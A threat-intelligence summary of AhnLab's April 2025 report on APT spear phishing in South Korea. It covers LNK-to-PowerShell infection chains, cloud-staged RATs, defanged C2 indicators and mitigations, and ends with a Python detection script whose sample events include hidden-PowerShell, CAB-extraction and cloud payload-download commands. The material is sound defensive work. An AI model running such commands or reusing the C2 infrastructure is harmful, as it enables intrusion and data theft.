Full Report
Overview

AhnLab is monitoring Advanced Persistent Threat (APT) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and functions of APT attacks detected in South Korea over the course of one month in April 2025.

Figure 1. Statistics of APT attacks in South Korea in April 2025 […]
Analysis Summary
# Threat Actor: Unspecified APT Actor (Monitoring by AhnLab)
## Attribution & Identity
The report summarizes activity observed by AhnLab monitoring infrastructure in South Korea during April 2025. Specific attribution to a known named Advanced Persistent Threat (APT) group is **not explicitly provided** in this segment, though the activity is classified as APT attacks.
## Activity Summary
The summary focuses on APT attacks observed in South Korea during April 2025. The overwhelming majority of confirmed infiltration methods involved **spear phishing**. The actor conducts reconnaissance before launching these attacks in order to craft convincing emails, often using email spoofing.
Key attack types observed via spear phishing include:
1. **Attacks Using LNK Type A:** Distribution via LNK files embedded with malicious PowerShell commands. The commands extract and execute scripts (bat, ps1, vbs) from a CAB file contained in the LNK, leading to information leakage and the download of additional malware. Decoy documents were used to mask the malicious intent.
2. **Attacks Using LNK Type B:** Distribution via LNK files, usually packaged alongside seemingly legitimate files in compressed archives. These LNK files execute a malicious PowerShell command that downloads and deploys RAT malware via cloud services such as the Dropbox API or Google Drive.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear Phishing (Highly prevalent).
- **Execution:** Execution of malicious PowerShell commands embedded within LNK files.
- **Defense Evasion/Persistence:** Use of obfuscated RAT malware.
- **Collection:** Keylogging and screen capturing (via deployed RATs).
- **Command and Control:** Use of cloud storage APIs (Dropbox API, Google Drive) for malware delivery/staging.
**MITRE ATT&CK IDs (Inferred from TTPs):**
- Spear phishing likely relates to T1566.001/T1566.002.
- PowerShell execution relates to T1059.001.
- Remote Access Tool usage relates to T1219.
## Targeting
- **Sectors:** Not explicitly detailed, but the context strongly implies that South Korean entities are targeted, given AhnLab's focus and the decoy document names (e.g., tax notices, financial forms).
- **Geography:** South Korea.
- **Victims:** Unspecified organizations; victim data is derived from AhnLab's monitoring infrastructure.
## Tools & Infrastructure
- **Malware families used:**
  * XenoRAT
  * RoKRAT (RAT malware)
  * Custom scripts (bat, ps1, vbs)
  * Malware dropper/downloader components utilizing CAB archives.
- **Infrastructure (C2, domains, IPs):**
  * `http://103[.]149[.]98[.]247/vs/tt/d[.]php`
  * `http://141[.]164[.]36[.]253/news[.]mail[.]rupolitics3491273452346/mail[.]ru[.]php`
  * `http://141[.]164[.]58[.]164/news[.]mail[.]rupolitics34502732480574853/mail[.]ru[.]php`
  * `http://aomeio[.]r-e[.]kr/comarov/app/google`
  * `http://aomeioras2[.]r-e[.]kr/`
  * **IPs:** `64[.]20[.]59[.]148`
  * **Cloud Storage for C2/Staging:** Dropbox API, Google Drive.
## Implications
This threat actor demonstrates a high degree of preparation, conducting reconnaissance before deploying highly targeted spear phishing campaigns. The reliance on LNK files, PowerShell script execution chains, and cloud-staged delivery of well-known RATs indicates an established capability focused on persistent remote control and data exfiltration against South Korean targets.
## Mitigations
- **Email Security:** Enhance anti-phishing controls, implement rigorous email sender verification rules, and block potentially malicious file types (LNK, compressed archives) from external sources.
- **Endpoint Detection and Response (EDR):** Deploy solutions capable of detecting and blocking anomalous PowerShell execution, script chaining, and known RAT indicators.
- **User Awareness Training:** Conduct specific training detailing how to identify highly personalized spear phishing emails, especially those masquerading as official government or financial documents (e.g., eTax invoices, tax notices).
- **Network Monitoring:** Monitor outbound traffic for connections to known C2 infrastructure and for unusual access to cloud storage APIs that results in binary downloads.
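As an added, defender-side example that is not part of the AhnLab report: a small Python triage over constructed process-creation events, flagging the stages of the LNK chain described under Activity Summary (explorer.exe spawning hidden PowerShell, CAB extraction, dropped script execution) and the cloud-storage downloads the EDR and Network Monitoring mitigations call for. The sample events, the cloud host names and the expand.exe/extrac32.exe extraction tools are assumptions, not indicators from the report.

```python
import re

# Constructed Sysmon-style process-creation events (not from the report) mimicking the chain it describes.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -nop -w hidden -ep bypass -c "expand.exe $env:TEMP\\doc.cab -F:* $env:TEMP"'},
    {"parent": "powershell.exe", "image": "wscript.exe",
     "cmd": 'wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\run.vbs'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "iwr https://content.dropboxapi.com/2/files/download -OutFile $env:TEMP\\svc.dat"'},
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmd": 'winword.exe "C:\\Users\\u\\Documents\\report.docx"'},
]

# Assumed cloud-storage API hosts to watch for payload downloads (not indicators from the report).
CLOUD_HOSTS = ("dropboxapi.com", "drive.google.com", "googleapis.com")
TEMP_SCRIPT = re.compile(r'\\temp\\[^\s"]+\.(bat|ps1|vbs)\b', re.I)
HIDDEN_PS = re.compile(r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass|enc)", re.I)

def rule_lnk_powershell(ev):
    # An LNK double-click shows up as explorer.exe spawning PowerShell with hidden/bypass switches.
    return ev["parent"] == "explorer.exe" and ev["image"] == "powershell.exe" and bool(HIDDEN_PS.search(ev["cmd"]))

def rule_cab_extract(ev):
    # PowerShell unpacking a CAB with expand.exe or extrac32.exe (assumed extraction tools).
    return ev["image"] == "powershell.exe" and bool(re.search(r"\b(expand|extrac32)\.exe\b.*\.cab", ev["cmd"], re.I))

def rule_script_chain(ev):
    # A script host launched by PowerShell/cmd to run a bat/ps1/vbs dropped under a Temp directory.
    return (ev["parent"] in ("powershell.exe", "cmd.exe")
            and ev["image"] in ("wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe")
            and bool(TEMP_SCRIPT.search(ev["cmd"])))

def rule_cloud_download(ev):
    # PowerShell fetching a file from a cloud-storage API, the staging path the report describes.
    return (ev["image"] == "powershell.exe"
            and any(h in ev["cmd"].lower() for h in CLOUD_HOSTS)
            and bool(re.search(r"(iwr|invoke-webrequest|downloadfile|-outfile)", ev["cmd"], re.I)))

RULES = [("lnk_powershell", rule_lnk_powershell), ("cab_extract", rule_cab_extract), ("script_chain", rule_script_chain), ("cloud_download", rule_cloud_download)]

def triage(events):
    """Return (event index, rule name) for every rule that fires, in rule order."""
    findings = []
    for i, raw in enumerate(events):
        ev = {k: raw[k].rsplit("\\", 1)[-1].lower() for k in ("parent", "image")}  # bare lower-case image names
        ev["cmd"] = raw["cmd"]
        findings.extend((i, name) for name, rule in RULES if rule(ev))
    return findings
```

Calling `triage(SAMPLE_EVENTS)` returns the (event index, rule name) pairs that fired; in practice the input would be parsed Sysmon Event ID 1 records rather than the constructed list.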